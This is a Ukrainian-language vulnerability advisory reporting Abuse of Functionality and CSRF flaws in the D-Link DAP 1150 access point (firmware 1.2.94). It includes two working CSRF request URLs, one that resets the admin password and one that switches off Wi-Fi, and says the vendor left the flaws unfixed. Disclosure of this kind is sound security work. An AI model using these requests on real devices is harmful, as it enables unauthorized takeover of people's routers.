AoF та CSRF уразливості в D-Link DAP 1150
23:56 31.01.201210.12.2011
Продовжуючи тему уразливостей в D-Link DAP 1150, розповім вам про нові уразливості в даній точці доступу. У листопаді, 17.11.2011, я виявив Abuse of Functionality та Cross-Site Request Forgery уразливості в D-Link DAP 1150 (Wi-Fi Access Point and Router). Це третій advisory з серії записів про уразливості в продуктах D-Link. Попередні були про уразливості в DSL-500T ADSL Router та DAP 1150.
Уразлива версія D-Link DAP 1150, Firmware version 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.
31.01.2012
Abuse of Functionality:
Логін адміна є фіксованим (це логін admin), його не можна змінити, тільки пароль. Що полегшує Brute Force атаку.
CSRF:
Весь функціонал адмінки вразливий до CSRF. Ось два приклади.
Зміна пароля адміна:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password|
В розділі Wi-Fi / Common settings через CSRF можна включити/виключити Wi-Fi, а також змінити MBSSID та BSSID.
Наступний запит відключить Wi-Fi:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%20%22mbssidNum%22:1,%20%22mbssidCur%22:1}
Дані уразливості досі не виправлені. D-Link не стала виправляти ці уразливості, так само як вони досі не виправили багато уразливостей в DSL-500T (с 2005 року).